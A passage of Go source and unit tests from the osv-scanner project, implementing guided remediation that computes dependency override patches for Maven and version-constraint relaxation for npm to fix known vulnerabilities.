been already result.FilterVulns(opts.MatchVuln) // Do the resolutions concurrently type overrideResult struct { vulnIDs []string result *resolution.Result patches []overridePatch err error } ch := make(chan overrideResult) doOverride := func(vulnIDs []string) { res, patches, err := overridePatchVulns(ctx, cl, result, vulnIDs, opts) if err == nil { res.FilterVulns(opts.MatchVuln) } ch <- overrideResult{ vulnIDs: vulnIDs, result: res, patches: patches, err: err, } } toProcess := 0 for _, v := range result.Vulns { // TODO: limit the number of goroutines go doOverride([]string{v.OSV.GetId()}) toProcess++ } var allResults []resolution.Difference for toProcess > 0 { res := <-ch toProcess-- if errors.Is(res.err, errOverrideImpossible) { continue } if res.err != nil { // Resolution errors seem to happen when a package/version cannot be found, which isn't uncommon. // Just silently skip for now, treating it the same as unfixable. // TODO: Log the error somehow. continue } diff := result.CalculateDiff(res.result) // CalculateDiff does not compute override manifest patches correctly, manually fill it out. // TODO: CalculateDiff maybe should not be reconstructing patches. // Refactor CalculateDiff, Relaxer, Override to make patches in a more sane way. diff.Deps = make([]manifest.DependencyPatch, len(res.patches)) for i, p := range res.patches { diff.Deps[i] = manifest.DependencyPatch{ Pkg: p.PackageKey, Type: dep.Type{}, OrigRequire: "", // Using empty original to signal this is an override patch OrigResolved: p.OrigVersion, NewRequire: p.NewVersion, NewResolved: p.NewVersion, } } allResults = append(allResults, diff) // If there are any new vulns, try override them as well var newlyAdded []string for _, v := range diff.AddedVulns { if !slices.Contains(res.vulnIDs, v.OSV.GetId()) { newlyAdded = append(newlyAdded, v.OSV.GetId()) } } if len(newlyAdded) > 0 { go doOverride(append(res.vulnIDs, newlyAdded...)) // No need to clone res.vulnIDs here toProcess++ } } // Sort and remove duplicate patches slices.SortFunc(allResults, func(a, b resolution.Difference) int { return a.Compare(b) }) allResults = slices.CompactFunc(allResults, func(a, b resolution.Difference) bool { return a.Compare(b) == 0 }) return allResults, nil } var errOverrideImpossible = errors.New("cannot fix vulns by overrides") // overridePatchVulns tries to fix as many vulns in vulnIDs as possible by overriding dependency versions. // returns errOverrideImpossible if 0 vulns are patchable, otherwise returns the most possible patches. func overridePatchVulns(ctx context.Context, cl client.ResolutionClient, result *resolution.Result, vulnIDs []string, opts Options) (*resolution.Result, []overridePatch, error) { var effectivePatches []overridePatch for { // Find the relevant vulns affecting each version key. vkVulns := make(map[resolve.VersionKey][]*resolution.Vulnerability) for i, v := range result.Vulns { if !slices.Contains(vulnIDs, v.OSV.GetId()) { continue } // Keep track of VersionKeys we've seen for this vuln to avoid duplicates. // Usually, there will only be one VersionKey per vuln, but some vulns affect multiple packages. seenVKs := make(map[resolve.VersionKey]struct{}) // Use the Subgraphs to find all the affected nodes. for _, sg := range v.Subgraphs { for _, e := range sg.Nodes[sg.Dependency].Parents { // Currently, there is no way to know if a specific classifier or type exists for a given version with deps.dev. // Blindly updating versions can lead to compilation failures if the artifact+version+classifier+type doesn't exist. // We can't reliably attempt remediation in these cases, so don't try. if e.Type.HasAttr(dep.MavenClassifier) || e.Type.HasAttr(dep.MavenArtifactType) { return nil, nil, fmt.Errorf("%w: cannot fix vulns in artifacts with classifier or type", errOverrideImpossible) } vk := sg.Nodes[sg.Dependency].Version if _, seen := seenVKs[vk]; !seen { vkVulns[vk] = append(vkVulns[vk], &result.Vulns[i]) seenVKs[vk] = struct{}{} } } } } if len(vkVulns) == 0 { // All vulns have been fixed. break } newPatches := make([]overridePatch, 0, len(vkVulns)) // For each VersionKey, try fix as many of the vulns affecting it as possible. for vk, vulnerabilities := range vkVulns { // Consider vulns affecting packages we don't want to change unfixable if opts.UpgradeConfig.Get(vk.Name) == upgrade.None { continue } bestVK := vk bestCount := len(vulnerabilities) // remaining vulns versions, err := getVersionsGreater(ctx, cl, vk) if err != nil { return nil, nil, err } // Find the minimal greater version that fixes as many vulnerabilities as possible. for _, ver := range versions { // Break if we've encountered a disallowed version update. if _, diff, _ := vk.System.Semver().Difference(vk.Version, ver.Version); !opts.UpgradeConfig.Get(vk.Name).Allows(diff) { break } // Count the remaining known vulns that affect this version. count := 0 // remaining vulns for _, rv := range vulnerabilities { if vulns.IsAffected(rv.OSV, util.VKToPackageInfo(ver.VersionKey)) { count++ } } if count < bestCount { // Found a new candidate. bestCount = count bestVK = ver.VersionKey if bestCount == 0 { // stop if there are 0 vulns remaining break } } } if bestCount < len(vulnerabilities) { // Found a version that fixes some vulns. newPatches = append(newPatches, overridePatch{ PackageKey: vk.PackageKey, OrigVersion: vk.Version, NewVersion: bestVK.Version, }) } } if len(newPatches) == 0 { break } // Patch and re-resolve manifest newManif, err := patchManifest(newPatches, result.Manifest) if err != nil { return nil, nil, err } result, err = resolution.Resolve(ctx, cl, newManif, opts.ResolveOpts) if err != nil { return nil, nil, err } result.FilterVulns(opts.MatchVuln) // If the patch applies to a package that was already patched before, update the effective patch. for _, p := range newPatches { idx := slices.IndexFunc(effectivePatches, func(op overridePatch) bool { return op.PackageKey == p.PackageKey && op.NewVersion == p.OrigVersion }) if idx == -1 { effectivePatches = append(effectivePatches, p) } else { effectivePatches[idx].NewVersion = p.NewVersion } } } if len(effectivePatches) == 0 { return nil, nil, errOverrideImpossible } // Sort the patches for deterministic output. slices.SortFunc(effectivePatches, func(a, b overridePatch) int { if c := a.Compare(b.PackageKey); c != 0 { return c } return a.Semver().Compare(a.OrigVersion, b.OrigVersion) }) return result, effectivePatches, nil } // getVersionsGreater gets the known versions of a package that are greater than the given version, sorted in ascending order. func getVersionsGreater(ctx context.Context, cl client.DependencyClient, vk resolve.VersionKey) ([]resolve.Version, error) { // Get & sort all the valid versions of this package // TODO: (Maven) skip unlisted versions and versions on other registries versions, err := cl.Versions(ctx, vk.PackageKey) if err != nil { return nil, err } semvers := make(map[resolve.VersionKey]*semver.Version) for _, ver := range versions { parsed, err := semver.Maven.Parse(ver.Version) if err != nil { cmdlogger.Warnf("parsing Maven version %s: %v", parsed, err) continue } semvers[ver.VersionKey] = parsed } cmpFunc := func(a, b resolve.Version) int { if vk.System == resolve.Maven { return maven.CompareVersions(vk, semvers[a.VersionKey], semvers[b.VersionKey]) } return vk.Semver().Compare(a.Version, b.Version) } slices.SortFunc(versions, cmpFunc) // Find the index of the next higher version offset, vkFound := slices.BinarySearchFunc(versions, resolve.Version{VersionKey: vk}, cmpFunc) if vkFound { // if the given version somehow doesn't exist, offset will already be at the next higher version offset++ } return versions[offset:], nil } // patchManifest applies the overridePatches to the manifest in-memory. Returns a copy of the manifest that has been patched. func patchManifest(patches []overridePatch, m manifest.Manifest) (manifest.Manifest, error) { if m.System() != resolve.Maven { return manifest.Manifest{}, errors.New("unsupported ecosystem") } // TODO: The overridePatch does not have an artifact's type or classifier, which is part of what uniquely identifies them. // This needs to be part of the comparison & added to dependency management for it to override packages that specify them. patched := m.Clone() for _, p := range patches { found := false i := 0 for _, r := range patched.Requirements { if r.PackageKey != p.PackageKey { patched.Requirements[i] = r i++ continue } origin, hasOrigin := r.Type.GetAttr(dep.MavenDependencyOrigin) if !hasOrigin || origin == maven.OriginManagement { found = true r.Version = p.NewVersion patched.Requirements[i] = r i++ } } patched.Requirements = patched.Requirements[:i] if !found { newReq := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: p.PackageKey, Version: p.NewVersion, VersionType: resolve.Requirement, }, } newReq.Type.AddAttr(dep.MavenDependencyOrigin, maven.OriginManagement) patched.Requirements = append(patched.Requirements, newReq) } } return patched, nil } ================================================ FILE: internal/remediation/override_test.go ================================================ package remediation_test import ( "testing" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" ) func TestComputeOverridePatches(t *testing.T) { t.Parallel() basicOpts := remediation.Options{ DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } tests := []struct { name string universePath string vulnPath string manifestPath string opts remediation.Options }{ { name: "maven-zeppelin-server", universePath: "./testdata/zeppelin-server/universe.yaml", vulnPath: "./testdata/zeppelin-server/vulns.json", manifestPath: "./testdata/zeppelin-server/pom.xml", opts: basicOpts, }, { name: "maven-classifier", universePath: "./testdata/maven-classifier/universe.yaml", vulnPath: "./testdata/maven-classifier/vulns.json", manifestPath: "./testdata/maven-classifier/pom.xml", opts: basicOpts, }, { name: "maven-management-only", universePath: "./testdata/zeppelin-server/universe.yaml", vulnPath: "./testdata/zeppelin-server/vulns.json", manifestPath: "./testdata/zeppelin-server/parent/pom.xml", opts: remediation.Options{ ResolveOpts: resolution.ResolveOpts{ MavenManagement: true, }, DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), }, }, { name: "workaround-maven-guava-none-to-jre", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/guava/none-to-jre/pom.xml", opts: basicOpts, }, { name: "workaround-maven-guava-jre-to-jre", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/guava/jre-to-jre/pom.xml", opts: basicOpts, }, { name: "workaround-maven-guava-android-to-android", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/guava/android-to-android/pom.xml", opts: basicOpts, }, { name: "workaround-commons", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/commons/pom.xml", opts: basicOpts, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() res, cl := parseRemediationFixture(t, tt.universePath, tt.vulnPath, tt.manifestPath, tt.opts.ResolveOpts) res.FilterVulns(tt.opts.MatchVuln) p, err := remediation.ComputeOverridePatches(t.Context(), cl, res, tt.opts) if err != nil { t.Fatalf("Failed to compute override patches: %v", err) } checkRemediationResults(t, p) }) } } ================================================ FILE: internal/remediation/relax/npm.go ================================================ package relax import ( "context" "slices" "deps.dev/util/resolve" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) type NpmRelaxer struct{} func (r NpmRelaxer) Relax(ctx context.Context, cl resolve.Client, req resolve.RequirementVersion, config upgrade.Config) (resolve.RequirementVersion, bool) { configLevel := config.Get(req.Name) if configLevel == upgrade.None { return req, false } c, err := semver.NPM.ParseConstraint(req.Version) if err != nil { // The specified version is not a valid semver constraint // Check if it's a version tag (usually 'latest') by seeing if there are matching versions vks, err := cl.MatchingVersions(ctx, req.VersionKey) if err != nil || len(vks) == 0 { // no matches, cannot relax return req, false } // Use the first matching version (there should only be one) as a pinned version c, err = semver.NPM.ParseConstraint(vks[0].Version) if err != nil { return req, false } } // Get all the concrete versions of the package allVKs, err := cl.Versions(ctx, req.PackageKey) if err != nil { return req, false } var vers []string for _, vk := range allVKs { if vk.VersionType == resolve.Concrete { vers = append(vers, vk.Version) } } slices.SortFunc(vers, semver.NPM.Compare) // Find the versions on either side of the upper boundary of the requirement var lastIdx int // highest version matching constraint nextIdx := -1 // next version outside of range, preferring non-prerelease nextIsPre := true // if the next version is a prerelease version for lastIdx = len(vers) - 1; lastIdx >= 0; lastIdx-- { v, err := semver.NPM.Parse(vers[lastIdx]) if err != nil { continue } if c.MatchVersion(v) { // found the upper bound, stop iterating break } // Want to prefer non-prerelease versions, so only select one if we haven't seen any non-prerelease versions if !v.IsPrerelease() || nextIsPre { nextIdx = lastIdx nextIsPre = v.IsPrerelease() } } // Didn't find any higher versions of the package if nextIdx == -1 { return req, false } // No versions match the existing constraint, something is wrong if lastIdx == -1 { return req, false } // Our desired relaxation ordering is // 1.2.3 -> 1.2.* -> 1.*.* -> 2.*.* -> 3.*.* -> ... // But we want to use npm-like version specifiers e.g. // 1.2.3 -> ~1.2.4 -> ^1.4.5 -> ^2.6.7 -> ^3.8.9 -> ... // using the latest versions of the ranges cmpVer := vers[lastIdx] _, diff, _ := semver.NPM.Difference(cmpVer, vers[nextIdx]) if !configLevel.Allows(diff) { return req, false } if diff == semver.DiffMajor { // Want to step only one major version at a time // Instead of looking for a difference larger than major, // we want to look for a major version bump from the first next version cmpVer = vers[nextIdx] diff = semver.DiffMinor } // Find the highest version with the same difference best := vers[nextIdx] for i := nextIdx + 1; i < len(vers); i++ { _, d, err := semver.NPM.Difference(cmpVer, vers[i]) if err != nil { continue } // If we've exceeded our allowed upgrade level, stop looking. if !configLevel.Allows(d) { break } // DiffMajor < DiffMinor < DiffPatch < DiffPrerelease // So if d is less than the original diff, it represents a larger change if d < diff { break } ver, err := semver.NPM.Parse(vers[i]) if err != nil { continue } if !ver.IsPrerelease() || nextIsPre { best = vers[i] } } if diff == semver.DiffPatch { req.Version = "~" + best } else { req.Version = "^" + best } return req, true } ================================================ FILE: internal/remediation/relax/npm_test.go ================================================ package relax_test import ( "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation/relax" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) func TestRelaxNpm(t *testing.T) { t.Parallel() type result struct { version string ok bool } tests := []struct { name string versions []string from string upgradeConfig upgrade.Config want result }{ { name: "pinned-to-patch", versions: []string{"1.2.3", "1.2.4", "1.2.5", "1.3.0", "2.0.0"}, from: "1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "~1.2.5", ok: true, }, }, { name: "patch-to-minor", versions: []string{"1.2.3", "1.2.4", "1.3.0", "1.3.1", "2.0.0"}, from: "~1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "^1.3.1", ok: true, }, }, { name: "minor-to-next-major", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.4.5", ok: true, }, }, { name: "skip-missing-major", versions: []string{"1.0.0", "3.0.0", "4.0.0"}, from: "^1.0.0", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^3.0.0", ok: true, }, }, { name: "no-more-versions", versions: []string{"1.2.3", "1.3.4", "1.4.5"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "avoid-prerelease-patch", versions: []string{"1.2.3", "1.2.4", "1.2.5-alpha"}, from: "1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "~1.2.4", ok: true, }, }, { name: "avoid-prerelease-minor", versions: []string{"1.2.3", "1.3.4", "1.4.5-alpha"}, from: "~1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^1.3.4", ok: true, }, }, { name: "skip-prerelease", versions: []string{"1.2.3", "2.0.0-alpha", "2.0.0", "3.0.0"}, from: "^1.0.0", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.0.0", ok: true, }, }, { name: "choose-final-prerelease", versions: []string{"1.2.3", "2.0.0-alpha.0", "2.0.0-alpha.1", "2.0.0-beta"}, from: "^1.0.0", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.0.0-beta", ok: true, }, }, { name: "from-prerelease", versions: []string{"1.0.0-pre", "1.2.3", "2.0.0-pre", "2.3.4"}, from: "^1.0.0-pre", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.3.4", ok: true, }, }, { name: "disallow-major", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "disallow-major-pkg-only", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"disallow-major-pkg-only": upgrade.Minor, "": upgrade.None}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "disallow-pkg", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"disallow-pkg": upgrade.None}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "disallow-minor", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "~1.2.3", upgradeConfig: upgrade.Config{"disallow-minor": upgrade.Patch}, want: result{ version: "~1.2.3", ok: false, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() cl := resolve.NewLocalClient() pk := resolve.PackageKey{ Name: tt.name, System: resolve.NPM, } for _, v := range tt.versions { cl.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, Version: v, VersionType: resolve.Concrete, }, }, nil) } relaxer := relax.NpmRelaxer{} got, ok := relaxer.Relax(t.Context(), cl, resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.from, }}, tt.upgradeConfig) if got.Version != tt.want.version || ok != tt.want.ok { t.Errorf("Relax() = (%s, %v), want (%s, %v)", got.Version, ok, tt.want.version, tt.want.ok) } }) } } ================================================ FILE: internal/remediation/relax/relax.go ================================================ // Package relax provides functionality for relaxing version constraints for guided remediation. package relax import ( "context" "errors" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) // A RequirementRelaxer provides an ecosystem-specific method for 'relaxing' the // specified versions of dependencies for vulnerability remediation. // Relaxing involves incrementally widening and bumping the version specifiers // of the requirement to allow more recent versions to be selected during // dependency resolution. // It has access to the available versions of a package via a resolve client. // // e.g. in a semver-like ecosystem, relaxation could follow the sequence: // 1.2.3 -> 1.2.* -> 1.*.* -> 2.*.* -> 3.*.* -> ... type RequirementRelaxer interface { // Relax attempts to relax import requirement. // Returns the newly relaxed import and true it was successful. // If unsuccessful, it returns the original import and false. Relax(ctx context.Context, cl resolve.Client, req resolve.RequirementVersion, config upgrade.Config) (resolve.RequirementVersion, bool) } func GetRelaxer(ecosystem resolve.System) (RequirementRelaxer, error) { // TODO: is using ecosystem fine, or should this be per manifest? switch ecosystem { case resolve.NPM: return NpmRelaxer{}, nil default: return nil, errors.New("unsupported ecosystem") } } ================================================ FILE: internal/remediation/relax.go ================================================ package remediation import ( "context" "errors" "slices" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation/relax" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" ) // ComputeRelaxPatches attempts to resolve each vulnerability found in result independently, returning the list of unique possible patches func ComputeRelaxPatches(ctx context.Context, cl client.ResolutionClient, result *resolution.Result, opts Options) ([]resolution.Difference, error) { // Filter the original result just in case it hasn't been already result.FilterVulns(opts.MatchVuln) // Do the resolutions concurrently type relaxResult struct { vulnIDs []string result *resolution.Result err error } ch := make(chan relaxResult) doRelax := func(vulnIDs []string) { res, err := tryRelaxRemediate(ctx, cl, result, vulnIDs, opts) if err == nil { res.FilterVulns(opts.MatchVuln) } ch <- relaxResult{ vulnIDs: vulnIDs, result: res, err: err, } } toProcess := 0 for _, vuln := range result.Vulns { // TODO: limit the number of goroutines go doRelax([]string{vuln.OSV.GetId()}) toProcess++ } var allResults []resolution.Difference for toProcess > 0 { res := <-ch toProcess-- if errors.Is(res.err, errRelaxRemediateImpossible) { // failed because it cannot be resolved - do not add it to list continue } if res.err != nil { // failed for some other reason - abort // TODO: stop goroutines return nil, res.err } diff := result.CalculateDiff(res.result) allResults = append(allResults, diff) // If this patch adds a new vuln, see if we can fix it also // TODO: If there's more than 1 added vuln, this can possibly cause every permutation of those vulns to be computed for _, added := range diff.AddedVulns { go doRelax(append(slices.Clone(res.vulnIDs), added.OSV.GetId())) toProcess++ } } // Sort and remove duplicate patches slices.SortFunc(allResults, func(a, b resolution.Difference) int { return a.Compare(b) }) allResults = slices.CompactFunc(allResults, func(a, b resolution.Difference) bool { return a.Compare(b) == 0 }) return allResults, nil } var errRelaxRemediateImpossible = errors.New("cannot fix vulns by relaxing") func tryRelaxRemediate( ctx context.Context, cl client.ResolutionClient, orig *resolution.Result, vulnIDs []string, opts Options, ) (*resolution.Result, error) { relaxer, err := relax.GetRelaxer(orig.Manifest.System()) if err != nil { return nil, err } newRes := orig toRelax := reqsToRelax(ctx, cl, newRes, vulnIDs, opts) for len(toRelax) > 0 { // Try relaxing all necessary requirements manif := newRes.Manifest.Clone() for _, idx := range toRelax { rv := manif.Requirements[idx] // If we'd need to relax a package we want to avoid changing, we cannot fix the vuln if opts.UpgradeConfig.Get(rv.Name) == upgrade.None { return nil, errRelaxRemediateImpossible } newVer, ok := relaxer.Relax(ctx, cl, rv, opts.UpgradeConfig) if !ok { return nil, errRelaxRemediateImpossible } manif.Requirements[idx] = newVer } // re-resolve relaxed manifest newRes, err = resolution.Resolve(ctx, cl, manif, opts.ResolveOpts) if err != nil { return nil, err } toRelax = reqsToRelax(ctx, cl, newRes, vulnIDs, opts) } return newRes, nil } func reqsToRelax(ctx context.Context, cl resolve.Client, res *resolution.Result, vulnIDs []string, opts Options) []int { toRelax := make(map[resolve.VersionKey]string) for _, v := range res.Vulns { // Don't do a full opts.MatchVuln() since we know we don't need to check every condition if !slices.Contains(vulnIDs, v.OSV.GetId()) || (!opts.DevDeps && v.DevOnly) { continue } // Only relax dependencies if their distance is less than MaxDepth for _, sg := range v.Subgraphs { constr := sg.ConstrainingSubgraph(ctx, cl, v.OSV) for _, edge := range constr.Nodes[0].Children { gNode := constr.Nodes[edge.To] if opts.MaxDepth <= 0 || gNode.Distance+1 <= opts.MaxDepth { toRelax[gNode.Version] = edge.Requirement } } } } // Find the index into the Manifest.Requirements of each that needs to be relaxed reqIdxs := make([]int, 0, len(toRelax)) for vk, req := range toRelax { idx := slices.IndexFunc(res.Manifest.Requirements, func(rv resolve.RequirementVersion) bool { return rv.PackageKey == vk.PackageKey && rv.Version == req }) reqIdxs = append(reqIdxs, idx) } return reqIdxs } ================================================ FILE: internal/remediation/relax_test.go ================================================ package remediation_test import ( "testing" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) func TestComputeRelaxPatches(t *testing.T) { t.Parallel() basicOpts := remediation.Options{ DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } tests := []struct { name string universePath string vulnPath string manifestPath string opts remediation.Options }{ { name: "npm-santatracker", universePath: "./testdata/santatracker/universe.yaml", vulnPath: "./testdata/santatracker/vulns.json", manifestPath: "./testdata/santatracker/package.json", opts: basicOpts, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() res, cl := parseRemediationFixture(t, tt.universePath, tt.vulnPath, tt.manifestPath, tt.opts.ResolveOpts) res.FilterVulns(tt.opts.MatchVuln) p, err := remediation.ComputeRelaxPatches(t.Context(), cl, res, tt.opts) if err != nil { t.Fatalf("Failed to compute relaxation patches: %v", err) } checkRemediationResults(t, p) }) } } ================================================ FILE: internal/remediation/remediation.go ================================================ package remediation import ( "math" "slices" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/utility/severity" ) // TODO: Supported strategies should be part of the manifest/lockfile ReadWriter directly func SupportsRelax(m manifest.ReadWriter) bool { switch m.(type) { case manifest.NpmReadWriter: return true default: return false } } func SupportsOverride(m manifest.ReadWriter) bool { switch m.(type) { case manifest.MavenReadWriter: return true default: return false } } func SupportsInPlace(l lockfile.ReadWriter) bool { switch l.(type) { case lockfile.NpmReadWriter: return true default: return false } } type Options struct { resolution.ResolveOpts IgnoreVulns []string // Vulnerability IDs to ignore ExplicitVulns []string // If set, only consider these vulnerability IDs & ignore all others DevDeps bool // Whether to consider vulnerabilities in dev dependencies MinSeverity float64 // Minimum vulnerability CVSS score to consider MaxDepth int // Maximum depth of dependency to consider vulnerabilities for (e.g. 1 for direct only) UpgradeConfig upgrade.Config // Allowed upgrade levels per package. } func (opts Options) MatchVuln(v resolution.Vulnerability) bool { if opts.matchID(v, opts.IgnoreVulns) { return false } if len(opts.ExplicitVulns) > 0 && !opts.matchID(v, opts.ExplicitVulns) { return false } if !opts.DevDeps && v.DevOnly { return false } return opts.matchSeverity(v) && opts.matchDepth(v) } func (opts Options) matchID(v resolution.Vulnerability, ids []string) bool { if slices.Contains(ids, v.OSV.GetId()) { return true } for _, id := range v.OSV.GetAliases() { if slices.Contains(ids, id) { return true } } return false } func (opts Options) matchSeverity(v resolution.Vulnerability) bool { maxScore := -1.0 // TODO: also check OSV.Affected[].Severity for _, sev := range v.OSV.GetSeverity() { if score, _, _ := severity.CalculateScore(sev); score > maxScore { maxScore = score } } // CVSS scores are meant to only be to 1 decimal place // and we want to avoid something being falsely rejected/included due to floating point precision. // Multiply and round to only consider relevant parts of the score. return math.Round(10*maxScore) >= math.Round(10*opts.MinSeverity) || maxScore < 0 // Always include vulns with unknown severities } func (opts Options) matchDepth(v resolution.Vulnerability) bool { if opts.MaxDepth <= 0 { return true } for _, sg := range v.Subgraphs { if sg.Nodes[0].Distance <= opts.MaxDepth { return true } } return false } ================================================ FILE: internal/remediation/remediation_test.go ================================================ package remediation_test import ( "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestMatchVuln(t *testing.T) { t.Parallel() var ( // ID: VULN-001, Dev: false, Severity: 6.6, Depth: 3, Aliases: CVE-111, OSV-2 vuln1 = resolution.Vulnerability{ OSV: &osvschema.Vulnerability{ Id: "VULN-001", Severity: []*osvschema.Severity{ {Type: osvschema.Severity_CVSS_V3, Score: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H"}, // 6.6 {Type: osvschema.Severity_CVSS_V2, Score: "AV:L/AC:L/Au:S/C:P/I:P/A:C"}, // 5.7 }, Aliases: []string{"CVE-111", "OSV-2"}, }, DevOnly: false, Subgraphs: []*resolution.DependencySubgraph{{ Dependency: 3, Nodes: map[resolve.NodeID]resolution.GraphNode{ 3: { Distance: 0, Parents: []resolve.Edge{{From: 2, To: 3}}, Children: []resolve.Edge{}, }, 2: { Distance: 1, Parents: []resolve.Edge{{From: 1, To: 2}}, Children: []resolve.Edge{{From: 2, To: 3}}, }, 1: { Distance: 2, Parents: []resolve.Edge{{From: 0, To: 1}}, Children: []resolve.Edge{{From: 1, To: 2}}, }, 0: { Distance: 3, Parents: []resolve.Edge{}, Children: []resolve.Edge{{From: 0, To: 1}}, }, }, }}, } // ID: VULN-002, Dev: true, Severity: N/A, Depth: 2 vuln2 = resolution.Vulnerability{ OSV: &osvschema.Vulnerability{ Id: "VULN-002", // No severity }, DevOnly: true, Subgraphs: []*resolution.DependencySubgraph{{ Dependency: 3, Nodes: map[resolve.NodeID]resolution.GraphNode{ 3: { Distance: 0, Parents: []resolve.Edge{{From: 2, To: 3}, {From: 1, To: 3}}, Children: []resolve.Edge{}, }, 2: { Distance: 1, Parents: []resolve.Edge{{From: 1, To: 2}}, Children: []resolve.Edge{{From: 2, To: 3}}, }, 1: { Distance: 1, Parents: []resolve.Edge{{From: 0, To: 1}}, Children: []resolve.Edge{{From: 1, To: 2}, {From: 1, To: 3}}, }, 0: { Distance: 2, Parents: []resolve.Edge{}, Children: []resolve.Edge{{From: 0, To: 1}}, }, }, }}, } ) tests := []struct { name string vuln resolution.Vulnerability opt remediation.Options want bool }{ { name: "basic_match", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, }, want: true, }, { name: "accept_depth", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: 2, }, want: true, }, { name: "reject_depth", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: 1, }, want: false, }, { name: "accept_severity", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, MinSeverity: 6.6, }, want: true, }, { name: "reject_severity", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, MinSeverity: 6.7, }, want: false, }, { name: "accept_unknown_severity", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, MinSeverity: 10.0, }, want: true, }, { name: "accept_non-dev", vuln: vuln1, opt: remediation.Options{ DevDeps: false, MaxDepth: -1, }, want: true, }, { name: "reject_dev", vuln: vuln2, opt: remediation.Options{ DevDeps: false, MaxDepth: -1, }, want: false, }, { name: "reject_ID_excluded", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, IgnoreVulns: []string{"VULN-001"}, }, want: false, }, { name: "reject_ID_not_in_explicit", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, ExplicitVulns: []string{"VULN-999"}, }, want: false, }, { name: "reject_ID_in_explicit,_but_not_matching_other_fields", vuln: vuln2, opt: remediation.Options{ DevDeps: false, MaxDepth: 1, ExplicitVulns: []string{"VULN-002"}, }, want: false, }, { name: "accept_matching_multiple_1", vuln: vuln1, opt: remediation.Options{ DevDeps: false, MaxDepth: 3, MinSeverity: 5.0, IgnoreVulns: []string{"VULN-999"}, }, want: true, }, { name: "accept_matching_multiple_2", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: 2, MinSeverity: 8.8, ExplicitVulns: []string{"VULN-002"}, }, want: true, }, { name: "accept_explicit_ID_in_alias", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, ExplicitVulns: []string{"CVE-111"}, }, want: true, }, { name: "reject_excluded_ID_in_alias", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: 